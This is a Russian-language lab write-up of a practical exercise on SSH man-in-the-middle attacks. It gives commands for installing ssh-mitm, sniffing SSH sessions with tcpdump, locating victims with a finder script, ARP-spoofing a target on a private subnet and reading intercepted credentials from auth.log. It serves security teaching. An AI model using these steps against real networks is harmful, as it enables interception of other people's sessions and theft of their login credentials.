# Практическая работа MITM SSH ## Установим SSH MITM: `sudo apt install python3-netaddr python3-netifaces` - сетевые либы Питона `git clone https://github.com/jtesta/ssh-mitm` ![](https://i.imgur.com/oZNAc23.png) ## tcpdump Ищем ssh-соединения при помощи tcpdump: `sudo tcpdump -w ssh.cap` - с генерацией txt-файла отчёта `tcpdump -r ssh.cap -n port 22` - открывает файл, который был создан ранее по 22 порту Можно запустить также по поиску на нестандартных (не 22-му) портах: `tcpdump -r ssh.cap -n -A |grep -E '@openssh.com'` - будет искать в обращения указанный в кавычках текст. С помощью этого сужаем круг поисков до потенциально интересующих нас подключений ![](https://i.imgur.com/CFRBh6P.jpg) ![](https://i.imgur.com/ka2aoel.jpg) Запуск поиска при помощи JoesAwesomeSSHMITMVictimFinder: `sudo ./JoesAwesomeSSHMITMVictimFinder.py --interface eth0 --block-size 255` - указываем интерфейс, по которому ищем и размер ![](https://i.imgur.com/6d7Wwfq.png) Выполняем подключение с клиента ![](https://i.imgur.com/QF6HsId.png) JoesAwesomeSSHMITMVictimFinder находит сессию, которая была открыта шагом ранее: ![](https://i.imgur.com/OjQiFAt.png) ![](https://i.imgur.com/g3xCCTj.png) Запустим спуфинг: `arpspoof -t 192.168.100.4 192.168.100.9` - отлавливаем на 4-ом (целевом узле) и передаём на 9-ый ![](https://i.imgur.com/ixGIIIU.jpg) Подтвердим соединение: ![](https://i.imgur.com/UHdXYyK.png) Просмотрим полученные таким образом креды: `tail -f /var/log/auth.log` ![](https://i.imgur.com/S2ZeYhF.png)